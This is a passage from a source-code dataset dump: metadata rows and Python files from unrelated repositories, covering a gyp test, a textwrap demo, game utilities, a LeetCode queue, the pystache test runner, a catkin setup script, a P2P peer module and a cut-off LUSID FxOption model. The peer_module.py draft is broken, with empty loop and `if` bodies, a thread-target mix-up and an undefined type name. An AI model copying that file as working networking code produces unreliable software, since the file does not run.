] | permissive | marco-c/gecko-dev-comments-removed | 7a9dd34045b07e6b22f0c636c0a836b9e639f9d3 | 61942784fb157763e65608e5a29b3729b0aa66fa | refs/heads/master | 2023-08-09T18:55:25.895853 | 2023-08-01T00:40:39 | 2023-08-01T00:40:39 | 211,297,481 | 0 | 0 | NOASSERTION | 2019-09-29T01:27:49 | 2019-09-27T10:44:24 | C++ | UTF-8 | Python | false | false | 565 | py |
"""
Make sure batch files run as actions. Regression test for previously missing
trailing quote on command line. cmd typically will implicitly insert a missing
quote, but if the command ends in a quote, it will not insert another, so the
command can sometimes become unterminated.
"""
import TestGyp
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['msvs', 'ninja'])
CHDIR = 'batch-file-action'
test.run_gyp('batch-file-action.gyp', chdir=CHDIR)
test.build('batch-file-action.gyp', test.ALL, chdir=CHDIR)
test.pass_test()
| [
"[email protected]"
] | |
e60bc54cc535f4ab73531ba9f4f5eac45fce071c | 09145b3b07273e0e064a855cf2302220cebcf181 | /textwrap_ex.py | 95b08fe738e17f49e6c04d9e5cc134b0a91c315a | [] | no_license | 01x01/python3-standard-library | 7fa762a12cbcb3535bd8b31128bd9c3aed167e10 | 1af424a04d3f16abf1c6bc42abf80ae357e35920 | refs/heads/master | 2020-06-24T12:23:38.563609 | 2019-08-12T09:42:34 | 2019-08-12T09:42:34 | 168,808,293 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,217 | py | # coding: utf-8
# 文本段落格式化处理
# 主要功能: 类似文件编辑器覆盖或填充特性的编程功能
# 文本内容
sample_text = '''The textwrap module can be used to format text for output in
situations where pretty-printing is desired. It offers
programmatic functionality similar to the paragraph wrapping
or filling features found in many text editors.
'''
# textwrap 函数总结
# wrap(text,width=70,**kw) 输出一个list,每一行为list中的一个元素
# fill(text,width=70,**kw) 文本第一行缩进
# shorten(text,width,**kw) 摘要功能
# dedent(text) 移除缩进,空格
# indent(text,prefix,predicate=None)
# wrap
import textwrap
t1 = textwrap.wrap(sample_text)
print(t1)
# fill
t2 = textwrap.fill(sample_text,initial_indent="*"*4)
print(t2)
# shorten
t3 = textwrap.shorten(sample_text,width=10)
print(t3) # The [...]
# dedent
dedent_text = textwrap.dedent(sample_text)
print(dedent_text)
# indent
final = textwrap.indent(sample_text,'>')
print(final)
for width in [45,80]:
print("{} Columns is : \n".format(width))
t = textwrap.fill(sample_text,width=width)
print(t)
t5 = textwrap.fill(sample_text,subsequent_indent="*")
print(t5) | [
"[email protected]"
] | |
b741fb5ad71c5f866583c59b99471308f3687b26 | f3fb46ec8167c3d7e451265a76e1646aef78233f | /world/stat_checks/utils.py | 3d228a15fb3d369bed4b3c54c83fd1a965011308 | [
"MIT"
] | permissive | Arx-Game/arxcode | d1196941db4b551bb8ec96024241787cf4f34af3 | 363a1f14fd1a640580a4bf4486a1afe776757557 | refs/heads/stable_orphan | 2023-08-03T04:27:24.388330 | 2023-07-29T15:10:38 | 2023-07-29T15:10:38 | 144,421,010 | 52 | 45 | MIT | 2023-08-19T00:52:23 | 2018-08-11T22:06:07 | Python | UTF-8 | Python | false | false | 685 | py | """
Just a few utilities. Should NOT import anything in global scope to avoid
circular imports.
"""
def get_check_by_name(name: str):
"""
Convenience method to avoid worrying about circular imports when
fetching checks.
"""
from world.stat_checks.models import StatCheck
check = StatCheck.get_instance_by_name(name)
if not check:
raise StatCheck.DoesNotExist(f"No check exists by name '{name}'")
return check
def get_check_maker_by_name(name: str, character, **kwargs):
from world.stat_checks.check_maker import DefinedCheckMaker
return DefinedCheckMaker(
character=character, check=get_check_by_name(name), **kwargs
)
| [
"[email protected]"
] | |
e9f3f9f51a547f3f2aa65e33127282f566ad08a5 | 39b8aa964883b2bde4349e0c9c38e3233c310548 | /src/Implement Queue using Stacks.py | 421724c0e798d0e25106167e09fd34fd1f92ff3e | [] | no_license | orifake/leetcode-python | 053b82491e0b8d6197dd12d92eec5883211285db | 8e375ebebe0a0285efefc33ed61afb22f41d0c75 | refs/heads/master | 2023-03-09T14:32:17.833456 | 2021-02-26T16:09:31 | 2021-02-26T16:09:31 | 264,466,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 846 | py | class MyQueue:
def __init__(self):
"""
Initialize your data structure here.
"""
self.queue = []
def push(self, x: int) -> None:
"""
Push element x to the back of queue.
"""
return self.queue.append(x)
def pop(self) -> int:
"""
Removes the element from in front of queue and returns that element.
"""
return self.queue.pop(0)
def peek(self) -> int:
"""
Get the front element.
"""
return self.queue[0]
def empty(self) -> bool:
"""
Returns whether the queue is empty.
"""
return len(self.queue) == 0
# Your MyQueue object will be instantiated and called as such:
# obj = MyQueue()
# obj.push(x)
# param_2 = obj.pop()
# param_3 = obj.peek()
# param_4 = obj.empty() | [
"[email protected]"
] | |
800bfc292b541e358ca68c9e6c326a8a80714489 | 6581a1c0b04af75ab7d386597ec436bd4937b6df | /pystache/tests/main.py | 7342c91712b8528bdc016eb6c3da6dde4a999216 | [
"MIT"
] | permissive | trenchmortar/pystache | f3ab3263ca0e990176306d3a0de9a4fba441c78f | cc262abf19cd90e34390d5ddb5db30d6f04620fa | refs/heads/master | 2020-04-23T00:33:47.600879 | 2012-04-26T05:49:19 | 2012-04-26T05:49:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,685 | py | # coding: utf-8
"""
Exposes a run_tests() function that runs all tests in the project.
This module is for our test console script.
"""
import os
import sys
import unittest
from unittest import TestProgram
import pystache
from pystache.tests.common import PACKAGE_DIR, PROJECT_DIR, SPEC_TEST_DIR, UNITTEST_FILE_PREFIX
from pystache.tests.common import get_module_names
from pystache.tests.doctesting import get_doctests
from pystache.tests.spectesting import get_spec_tests
# If this command option is present, then the spec test and doctest directories
# will be inserted if not provided.
FROM_SOURCE_OPTION = "--from-source"
def run_tests(sys_argv):
"""
Run all tests in the project.
Arguments:
sys_argv: a reference to sys.argv.
"""
should_source_exist = False
spec_test_dir = None
project_dir = None
if len(sys_argv) > 1 and sys_argv[1] == FROM_SOURCE_OPTION:
should_source_exist = True
sys_argv.pop(1)
# TODO: use logging module
print "pystache: running tests: expecting source: %s" % should_source_exist
try:
# TODO: use optparse command options instead.
spec_test_dir = sys_argv[1]
sys_argv.pop(1)
except IndexError:
if should_source_exist:
spec_test_dir = SPEC_TEST_DIR
try:
# TODO: use optparse command options instead.
project_dir = sys_argv[1]
sys_argv.pop(1)
except IndexError:
if should_source_exist:
project_dir = PROJECT_DIR
if len(sys_argv) <= 1 or sys_argv[-1].startswith("-"):
# Then no explicit module or test names were provided, so
# auto-detect all unit tests.
module_names = _discover_test_modules(PACKAGE_DIR)
sys_argv.extend(module_names)
if project_dir is not None:
# Add the current module for unit tests contained here.
sys_argv.append(__name__)
_PystacheTestProgram._text_doctest_dir = project_dir
_PystacheTestProgram._spec_test_dir = spec_test_dir
SetupTests.project_dir = project_dir
# We pass None for the module because we do not want the unittest
# module to resolve module names relative to a given module.
# (This would require importing all of the unittest modules from
# this module.) See the loadTestsFromName() method of the
# unittest.TestLoader class for more details on this parameter.
_PystacheTestProgram(argv=sys_argv, module=None)
# No need to return since unitttest.main() exits.
def _discover_test_modules(package_dir):
"""
Discover and return a sorted list of the names of unit-test modules.
"""
def is_unittest_module(path):
file_name = os.path.basename(path)
return file_name.startswith(UNITTEST_FILE_PREFIX)
names = get_module_names(package_dir=package_dir, should_include=is_unittest_module)
# This is a sanity check to ensure that the unit-test discovery
# methods are working.
if len(names) < 1:
raise Exception("No unit-test modules found--\n in %s" % package_dir)
return names
class SetupTests(unittest.TestCase):
"""Tests about setup.py."""
project_dir = None
def test_version(self):
"""
Test that setup.py's version matches the package's version.
"""
original_path = list(sys.path)
sys.path.insert(0, self.project_dir)
try:
from setup import VERSION
self.assertEqual(VERSION, pystache.__version__)
finally:
sys.path = original_path
# The function unittest.main() is an alias for unittest.TestProgram's
# constructor. TestProgram's constructor calls self.runTests() as its
# final step, which expects self.test to be set. The constructor sets
# the self.test attribute by calling one of self.testLoader's "loadTests"
# methods prior to callint self.runTests(). Each loadTest method returns
# a unittest.TestSuite instance. Thus, self.test is set to a TestSuite
# instance prior to calling runTests().
class _PystacheTestProgram(TestProgram):
"""
Instantiating an instance of this class runs all tests.
"""
def runTests(self):
# self.test is a unittest.TestSuite instance:
# http://docs.python.org/library/unittest.html#unittest.TestSuite
tests = self.test
if self._text_doctest_dir is not None:
doctest_suites = get_doctests(self._text_doctest_dir)
tests.addTests(doctest_suites)
if self._spec_test_dir is not None:
spec_testcases = get_spec_tests(self._spec_test_dir)
tests.addTests(spec_testcases)
TestProgram.runTests(self)
| [
"[email protected]"
] | |
15f633e272b1b92e4d97a869ad3ba15c12d17163 | b1b86d8528df27d99ed56ed16f1ba15b5ae78661 | /build_isolated/velodyne_pcl/catkin_generated/generate_cached_setup.py | 4f904fedba7e034ad97a16d679350a13b75ec8ee | [] | no_license | gychen-n/match | 8754ac128b43f81e00faf3ab2af160af70a1d4a3 | ec91f19d104aa4a827c9f66d362f94fe44739cad | refs/heads/main | 2023-04-09T19:56:55.507118 | 2021-04-15T13:39:02 | 2021-04-15T13:39:02 | 358,268,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,688 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in '/home/gyc/match_ws/devel_isolated/velodyne_driver;/home/gyc/match_ws/devel_isolated/velodyne_msgs;/home/gyc/match_ws/devel_isolated/velodyne_laserscan;/home/gyc/match_ws/devel_isolated/velodyne;/home/gyc/match_ws/devel_isolated/slam_gmapping;/home/gyc/match_ws/devel_isolated/simulation_launch;/home/gyc/match_ws/devel_isolated/pointcloud_to_laserscan;/home/gyc/match_ws/devel_isolated/path_rviz_plugin;/home/gyc/match_ws/devel_isolated/path_server;/home/gyc/match_ws/devel_isolated/gmapping;/home/gyc/match_ws/devel_isolated/openslam_gmapping;/home/gyc/match_ws/devel_isolated/navigation;/home/gyc/match_ws/devel_isolated/move_base_flex;/home/gyc/match_ws/devel_isolated/mbf_simple_nav;/home/gyc/match_ws/devel_isolated/mbf_abstract_nav;/home/gyc/match_ws/devel_isolated/mbf_utility;/home/gyc/match_ws/devel_isolated/mbf_msgs;/home/gyc/match_ws/devel_isolated/mbf_abstract_core;/home/gyc/match_ws/devel_isolated/map_server;/home/gyc/match_ws/devel_isolated/location_fusion;/home/gyc/match_ws/devel_isolated/fake_localization;/home/gyc/match_ws/devel_isolated/dashgo_driver;/home/gyc/match_ws/devel_isolated/cartographer_rviz;/home/gyc/match_ws/devel_isolated/cartographer_ros;/home/gyc/match_ws/devel_isolated/cartographer_ros_msgs;/home/gyc/match_ws/devel_isolated/autolabor_test_launch;/home/gyc/match_ws/devel_isolated/autolabor_navigation_launch;/home/gyc/match_ws/devel_isolated/ah100b;/opt/ros/melodic'.split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/gyc/match_ws/devel_isolated/velodyne_pcl/env.sh')
output_filename = '/home/gyc/match_ws/build_isolated/velodyne_pcl/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
# print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| [
"[email protected]"
] | |
413503c12f4dc6734628644e7c8b0fb1e3e15539 | aeec646a9a2feb6fbaac31d4548d9aa09ad125e3 | /peer_module.py | 879a6662404995a3a8da03457bae8f7f63f7be5e | [
"MIT"
] | permissive | hslee1539/p2p | c0a9798e6da54029373ddf3d2b74ff30dc27e567 | c472271eff409ef345f29ef32f562a5f5e00d3ba | refs/heads/master | 2020-07-18T14:45:33.260168 | 2019-09-10T07:45:45 | 2019-09-10T07:45:45 | 206,264,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,674 | py | import socket
import threading
import random
import p2p
class Peer:
""""""
ip : str
controlPort : int
connectionPorts : list
service : str
peerList : list
maxConnection : int
serverThreads : list
clientThreads : list
serverState : list
running : bool
controlSocket : socket.socket
controlThread : threading.Thread
def __init__(self, service : str, controlPort : int, connectionPorts : list, peerList = []):
self.peerList = peerList
self.service = service
self.controlPort = controlPort
self.connectionPorts = connectionPorts
self.maxConnection = len(connectionPorts)
self.ip = socket.gethostbyname(socket.getfqdn())
self.serverState = [False] * self.maxConnection
def start(self):
""""""
self.running = True
self.controlThread = threading.Thread(target=self._controlServer)
self.controlThread.start()
self.serverThreads = list(self._socketThreadGenerator(self._client))
self.clientThreads = list(self._socketThreadGenerator(self._client))
for serverThread in self.serverThreads:
serverThread.start()
for clientThread in self.clientThreads:
clientThread.start()
def _socketThreadGenerator(self, target : function):
for index in range(self.maxConnection):
yield threading.Thread(target=target, args=(index,))
def _findSleepServerIndex(self):
for i in range(self.maxConnection):
if(self.serverState[i] == False):
return i
return self.maxConnection
def _controlServer(self):
"""컨트롤 서버가 연결 유지가 가능한 포트를 클라이언트에 알려주도록 운영합니다."""
with socket.socket() as sock:
sock.bind((self.ip, self.controlPort))
sock.settimeout(1)
sock.listen()
while(self.running):
try:
clientSocket, address = sock.accept()
except socket.timeout:
continue
clientSocket : socket.socket
try:
clientSocket.sendall(self.service.encode())
retval = clientSocket.recv(1024)
if (self.service == retval.decode()):
clientSocket.sendall(str(self.connectionPorts[self._findSleepServerIndex()]).encode())
except socket.timeout:
pass
finally:
clientSocket.close()
def _server(self, index : int):
""""""
with socket.socket() as sock:
sock.bind((self.ip, self.connectionPorts[index]))
sock.settimeout(1)
sock.listen()
while(self.running):
try:
self.serverState[index] = False
clientSocket, address = sock.accept()
except socket.timeout:
continue
clientSocket : socket.socket
self.serverState[index] = True
try:
clientSocket.sendall(self.service.encode())
retval = clientSocket.recv()
if (self.service == retval.decode()):
except socket.timeout:
pass
finally:
clientSocket.close()
def _serverConnect(self):
while (self.running):
def _client(self, index : int):
"""""" | [
"[email protected]"
] | |
7f53a02ffe54ce6ac59ddf141ab26147d828a8de | c79779a1233e95858499143d717a41205932c53d | /pypi_practices/check_readme.py | 87c4304a51e43f77a2ba84c739eb4ed25c7ac8d5 | [
"MIT"
] | permissive | asottile-archive/pypi_practices | a8915fca09619f741f385c000bc98d84f9fd515f | a4da562c471198dd35806c52016fac44bb46c08d | refs/heads/master | 2021-09-15T02:01:34.023997 | 2018-05-24T00:46:27 | 2018-05-24T00:46:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | from __future__ import print_function
import os.path
from pypi_practices.errors import FileValidationError
from pypi_practices.make_entry import make_entry
def check_readme(cwd):
readme_path = os.path.join(cwd, 'README.md')
if not os.path.exists(readme_path):
raise FileValidationError(
'README.md',
'File does not exist.',
is_auto_fixable=True,
)
# TODO: attempt to get project name from config
# TODO: attempt to get project name from tox.ini
# TODO: attempt to get project name from setup.py
return 0
entry = make_entry(check_readme)
if __name__ == '__main__':
exit(entry())
| [
"[email protected]"
] | |
6cef9ae7e0a2600c467a578aeb711fdf209a3328 | f72c9e46af5ce5ac738693daf65e67a0962a229a | /sdk/lusid/models/fx_option.py | 6f45a06959519c74da7262d99971e7531c3a0536 | [
"MIT"
] | permissive | finbourne/lusid-sdk-python | db8ce602f8408169f6583783c80ebbef83c77807 | 32fedc00ce5a37a6fe3bd9b9962570a8a9348e48 | refs/heads/master | 2023-08-29T18:22:49.488811 | 2023-08-29T15:57:26 | 2023-08-29T15:57:26 | 125,082,278 | 11 | 11 | NOASSERTION | 2023-04-28T07:16:48 | 2018-03-13T16:31:54 | Python | UTF-8 | Python | false | false | 28,291 | py | # coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 1.0.463
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from lusid.configuration import Configuration
class FxOption(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
required_map (dict): The key is attribute name
and the value is whether it is 'required' or 'optional'.
"""
openapi_types = {
'start_date': 'datetime',
'dom_ccy': 'str',
'dom_amount': 'float',
'fgn_ccy': 'str',
'fgn_amount': 'float',
'strike': 'float',
'barriers': 'list[Barrier]',
'exercise_type': 'str',
'is_call_not_put': 'bool',
'is_delivery_not_cash': 'bool',
'is_payoff_digital': 'bool',
'option_maturity_date': 'datetime',
'option_settlement_date': 'datetime',
'payout_style': 'str',
'premium': 'Premium',
'touches': 'list[Touch]',
'instrument_type': 'str'
}
attribute_map = {
'start_date': 'startDate',
'dom_ccy': 'domCcy',
'dom_amount': 'domAmount',
'fgn_ccy': 'fgnCcy',
'fgn_amount': 'fgnAmount',
'strike': 'strike',
'barriers': 'barriers',
'exercise_type': 'exerciseType',
'is_call_not_put': 'isCallNotPut',
'is_delivery_not_cash': 'isDeliveryNotCash',
'is_payoff_digital': 'isPayoffDigital',
'option_maturity_date': 'optionMaturityDate',
'option_settlement_date': 'optionSettlementDate',
'payout_style': 'payoutStyle',
'premium': 'premium',
'touches': 'touches',
'instrument_type': 'instrumentType'
}
required_map = {
'start_date': 'required',
'dom_ccy': 'required',
'dom_amount': 'optional',
'fgn_ccy': 'required',
'fgn_amount': 'optional',
'strike': 'optional',
'barriers': 'optional',
'exercise_type': 'optional',
'is_call_not_put': 'required',
'is_delivery_not_cash': 'required',
'is_payoff_digital': 'optional',
'option_maturity_date': 'required',
'option_settlement_date': 'required',
'payout_style': 'optional',
'premium': 'optional',
'touches': 'optional',
'instrument_type': 'required'
}
def __init__(self, start_date=None, dom_ccy=None, dom_amount=None, fgn_ccy=None, fgn_amount=None, strike=None, barriers=None, exercise_type=None, is_call_not_put=None, is_delivery_not_cash=None, is_payoff_digital=None, option_maturity_date=None, option_settlement_date=None, payout_style=None, premium=None, touches=None, instrument_type=None, local_vars_configuration=None): # noqa: E501
"""FxOption - a model defined in OpenAPI"
:param start_date: The start date of the instrument. This is normally synonymous with the trade-date. (required)
:type start_date: datetime
:param dom_ccy: The domestic currency of the instrument. (required)
:type dom_ccy: str
:param dom_amount: The Amount of DomCcy that will be exchanged if the option is exercised. This amount should be a positive number, with the Call/Put flag used to indicate direction. The corresponding amount of FgnCcy that will be exchanged is this amount times the strike. Note there is no rounding performed on this computed value. This is an optional field, if not set the option ContractSize will default to 1.
:type dom_amount: float
:param fgn_ccy: The foreign currency of the FX. (required)
:type fgn_ccy: str
:param fgn_amount: For a vanilla FxOption contract, FgnAmount cannot be set. In case of a digital FxOption (IsPayoffDigital==true) a payoff (if the option is in the money) can be either in domestic or in foreign currency - for the latter FgnAmount must be set. Note: It is invalid to have FgnAmount and DomAmount at the same time.
:type fgn_amount: float
:param strike: The strike of the option.
:type strike: float
:param barriers: For a barrier option the list should not be empty. Up to two barriers are supported. An option cannot be at the same time barrier- and touch-option. One (or both) of the lists must be empty.
:type barriers: list[lusid.Barrier]
:param exercise_type: Type of optionality that is present; European, American. Supported string (enumeration) values are: [European, American].
:type exercise_type: str
:param is_call_not_put: True if the option is a call, false if the option is a put. (required)
:type is_call_not_put: bool
:param is_delivery_not_cash: True if the option delivers the FX underlying, False if the option is settled in cash. (required)
:type is_delivery_not_cash: bool
:param is_payoff_digital: By default IsPayoffDigital is false. If IsPayoffDigital=true, the option is 'digital', and the option payoff is 0 or 1 unit of currency, instead of a vanilla CallPayoff=max(spot-strike,0) or PutPayoff=max(strike-spot,0).
:type is_payoff_digital: bool
:param option_maturity_date: The maturity date of the option. (required)
:type option_maturity_date: datetime
:param option_settlement_date: The settlement date of the option. (required)
:type option_settlement_date: datetime
:param payout_style: PayoutStyle for touch options. For options without touch optionality, payoutStyle should not be set. For options with touch optionality (where the touches data has been set), payoutStyle must be defined and cannot be None. Supported string (enumeration) values are: [Deferred, Immediate].
:type payout_style: str
:param premium:
:type premium: lusid.Premium
:param touches: For a touch option the list should not be empty. Up to two touches are supported. An option cannot be at the same time barrier- and touch-option. One (or both) of the lists must be empty.
:type touches: list[lusid.Touch]
:param instrument_type: The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CapFloor, CashSettled, CdsIndex, Basket, FundingLeg, FxSwap, ForwardRateAgreement, SimpleInstrument, Repo, Equity, ExchangeTradedOption, ReferenceInstrument, ComplexBond, InflationLinkedBond, InflationSwap, SimpleCashFlowLoan (required)
:type instrument_type: str
""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._start_date = None
self._dom_ccy = None
self._dom_amount = None
self._fgn_ccy = None
self._fgn_amount = None
self._strike = None
self._barriers = None
self._exercise_type = None
self._is_call_not_put = None
self._is_delivery_not_cash = None
self._is_payoff_digital = None
self._option_maturity_date = None
self._option_settlement_date = None
self._payout_style = None
self._premium = None
self._touches = None
self._instrument_type = None
self.discriminator = None
self.start_date = start_date
self.dom_ccy = dom_ccy
self.dom_amount = dom_amount
self.fgn_ccy = fgn_ccy
self.fgn_amount = fgn_amount
self.strike = strike
self.barriers = barriers
self.exercise_type = exercise_type
self.is_call_not_put = is_call_not_put
self.is_delivery_not_cash = is_delivery_not_cash
if is_payoff_digital is not None:
self.is_payoff_digital = is_payoff_digital
self.option_maturity_date = option_maturity_date
self.option_settlement_date = option_settlement_date
self.payout_style = payout_style
if premium is not None:
self.premium = premium
self.touches = touches
self.instrument_type = instrument_type
@property
def start_date(self):
"""Gets the start_date of this FxOption. # noqa: E501
The start date of the instrument. This is normally synonymous with the trade-date. # noqa: E501
:return: The start_date of this FxOption. # noqa: E501
:rtype: datetime
"""
return self._start_date
@start_date.setter
def start_date(self, start_date):
"""Sets the start_date of this FxOption.
The start date of the instrument. This is normally synonymous with the trade-date. # noqa: E501
:param start_date: The start_date of this FxOption. # noqa: E501
:type start_date: datetime
"""
if self.local_vars_configuration.client_side_validation and start_date is None: # noqa: E501
raise ValueError("Invalid value for `start_date`, must not be `None`") # noqa: E501
self._start_date = start_date
@property
def dom_ccy(self):
"""Gets the dom_ccy of this FxOption. # noqa: E501
The domestic currency of the instrument. # noqa: E501
:return: The dom_ccy of this FxOption. # noqa: E501
:rtype: str
"""
return self._dom_ccy
@dom_ccy.setter
def dom_ccy(self, dom_ccy):
"""Sets the dom_ccy of this FxOption.
The domestic currency of the instrument. # noqa: E501
:param dom_ccy: The dom_ccy of this FxOption. # noqa: E501
:type dom_ccy: str
"""
if self.local_vars_configuration.client_side_validation and dom_ccy is None: # noqa: E501
raise ValueError("Invalid value for `dom_ccy`, must not be `None`") # noqa: E501
self._dom_ccy = dom_ccy
@property
def dom_amount(self):
"""Gets the dom_amount of this FxOption. # noqa: E501
The Amount of DomCcy that will be exchanged if the option is exercised. This amount should be a positive number, with the Call/Put flag used to indicate direction. The corresponding amount of FgnCcy that will be exchanged is this amount times the strike. Note there is no rounding performed on this computed value. This is an optional field, if not set the option ContractSize will default to 1. # noqa: E501
:return: The dom_amount of this FxOption. # noqa: E501
:rtype: float
"""
return self._dom_amount
@dom_amount.setter
def dom_amount(self, dom_amount):
"""Sets the dom_amount of this FxOption.
The Amount of DomCcy that will be exchanged if the option is exercised. This amount should be a positive number, with the Call/Put flag used to indicate direction. The corresponding amount of FgnCcy that will be exchanged is this amount times the strike. Note there is no rounding performed on this computed value. This is an optional field, if not set the option ContractSize will default to 1. # noqa: E501
:param dom_amount: The dom_amount of this FxOption. # noqa: E501
:type dom_amount: float
"""
self._dom_amount = dom_amount
@property
def fgn_ccy(self):
"""Gets the fgn_ccy of this FxOption. # noqa: E501
The foreign currency of the FX. # noqa: E501
:return: The fgn_ccy of this FxOption. # noqa: E501
:rtype: str
"""
return self._fgn_ccy
@fgn_ccy.setter
def fgn_ccy(self, fgn_ccy):
"""Sets the fgn_ccy of this FxOption.
The foreign currency of the FX. # noqa: E501
:param fgn_ccy: The fgn_ccy of this FxOption. # noqa: E501
:type fgn_ccy: str
"""
if self.local_vars_configuration.client_side_validation and fgn_ccy is None: # noqa: E501
raise ValueError("Invalid value for `fgn_ccy`, must not be `None`") # noqa: E501
self._fgn_ccy = fgn_ccy
@property
def fgn_amount(self):
"""Gets the fgn_amount of this FxOption. # noqa: E501
For a vanilla FxOption contract, FgnAmount cannot be set. In case of a digital FxOption (IsPayoffDigital==true) a payoff (if the option is in the money) can be either in domestic or in foreign currency - for the latter FgnAmount must be set. Note: It is invalid to have FgnAmount and DomAmount at the same time. # noqa: E501
:return: The fgn_amount of this FxOption. # noqa: E501
:rtype: float
"""
return self._fgn_amount
@fgn_amount.setter
def fgn_amount(self, fgn_amount):
"""Sets the fgn_amount of this FxOption.
For a vanilla FxOption contract, FgnAmount cannot be set. In case of a digital FxOption (IsPayoffDigital==true) a payoff (if the option is in the money) can be either in domestic or in foreign currency - for the latter FgnAmount must be set. Note: It is invalid to have FgnAmount and DomAmount at the same time. # noqa: E501
:param fgn_amount: The fgn_amount of this FxOption. # noqa: E501
:type fgn_amount: float
"""
self._fgn_amount = fgn_amount
@property
def strike(self):
"""Gets the strike of this FxOption. # noqa: E501
The strike of the option. # noqa: E501
:return: The strike of this FxOption. # noqa: E501
:rtype: float
"""
return self._strike
@strike.setter
def strike(self, strike):
"""Sets the strike of this FxOption.
The strike of the option. # noqa: E501
:param strike: The strike of this FxOption. # noqa: E501
:type strike: float
"""
self._strike = strike
@property
def barriers(self):
"""Gets the barriers of this FxOption. # noqa: E501
For a barrier option the list should not be empty. Up to two barriers are supported. An option cannot be at the same time barrier- and touch-option. One (or both) of the lists must be empty. # noqa: E501
:return: The barriers of this FxOption. # noqa: E501
:rtype: list[lusid.Barrier]
"""
return self._barriers
@barriers.setter
def barriers(self, barriers):
"""Sets the barriers of this FxOption.
For a barrier option the list should not be empty. Up to two barriers are supported. An option cannot be at the same time barrier- and touch-option. One (or both) of the lists must be empty. # noqa: E501
:param barriers: The barriers of this FxOption. # noqa: E501
:type barriers: list[lusid.Barrier]
"""
self._barriers = barriers
@property
def exercise_type(self):
"""Gets the exercise_type of this FxOption. # noqa: E501
Type of optionality that is present; European, American. Supported string (enumeration) values are: [European, American]. # noqa: E501
:return: The exercise_type of this FxOption. # noqa: E501
:rtype: str
"""
return self._exercise_type
@exercise_type.setter
def exercise_type(self, exercise_type):
"""Sets the exercise_type of this FxOption.
Type of optionality that is present; European, American. Supported string (enumeration) values are: [European, American]. # noqa: E501
:param exercise_type: The exercise_type of this FxOption. # noqa: E501
:type exercise_type: str
"""
self._exercise_type = exercise_type
@property
def is_call_not_put(self):
"""Gets the is_call_not_put of this FxOption. # noqa: E501
True if the option is a call, false if the option is a put. # noqa: E501
:return: The is_call_not_put of this FxOption. # noqa: E501
:rtype: bool
"""
return self._is_call_not_put
@is_call_not_put.setter
def is_call_not_put(self, is_call_not_put):
"""Sets the is_call_not_put of this FxOption.
True if the option is a call, false if the option is a put. # noqa: E501
:param is_call_not_put: The is_call_not_put of this FxOption. # noqa: E501
:type is_call_not_put: bool
"""
if self.local_vars_configuration.client_side_validation and is_call_not_put is None: # noqa: E501
raise ValueError("Invalid value for `is_call_not_put`, must not be `None`") # noqa: E501
self._is_call_not_put = is_call_not_put
@property
def is_delivery_not_cash(self):
"""Gets the is_delivery_not_cash of this FxOption. # noqa: E501
True if the option delivers the FX underlying, False if the option is settled in cash. # noqa: E501
:return: The is_delivery_not_cash of this FxOption. # noqa: E501
:rtype: bool
"""
return self._is_delivery_not_cash
@is_delivery_not_cash.setter
def is_delivery_not_cash(self, is_delivery_not_cash):
"""Sets the is_delivery_not_cash of this FxOption.
True if the option delivers the FX underlying, False if the option is settled in cash. # noqa: E501
:param is_delivery_not_cash: The is_delivery_not_cash of this FxOption. # noqa: E501
:type is_delivery_not_cash: bool
"""
if self.local_vars_configuration.client_side_validation and is_delivery_not_cash is None: # noqa: E501
raise ValueError("Invalid value for `is_delivery_not_cash`, must not be `None`") # noqa: E501
self._is_delivery_not_cash = is_delivery_not_cash
@property
def is_payoff_digital(self):
"""Gets the is_payoff_digital of this FxOption. # noqa: E501
By default IsPayoffDigital is false. If IsPayoffDigital=true, the option is 'digital', and the option payoff is 0 or 1 unit of currency, instead of a vanilla CallPayoff=max(spot-strike,0) or PutPayoff=max(strike-spot,0). # noqa: E501
:return: The is_payoff_digital of this FxOption. # noqa: E501
:rtype: bool
"""
return self._is_payoff_digital
@is_payoff_digital.setter
def is_payoff_digital(self, is_payoff_digital):
"""Sets the is_payoff_digital of this FxOption.
By default IsPayoffDigital is false. If IsPayoffDigital=true, the option is 'digital', and the option payoff is 0 or 1 unit of currency, instead of a vanilla CallPayoff=max(spot-strike,0) or PutPayoff=max(strike-spot,0). # noqa: E501
:param is_payoff_digital: The is_payoff_digital of this FxOption. # noqa: E501
:type is_payoff_digital: bool
"""
self._is_payoff_digital = is_payoff_digital
@property
def option_maturity_date(self):
"""Gets the option_maturity_date of this FxOption. # noqa: E501
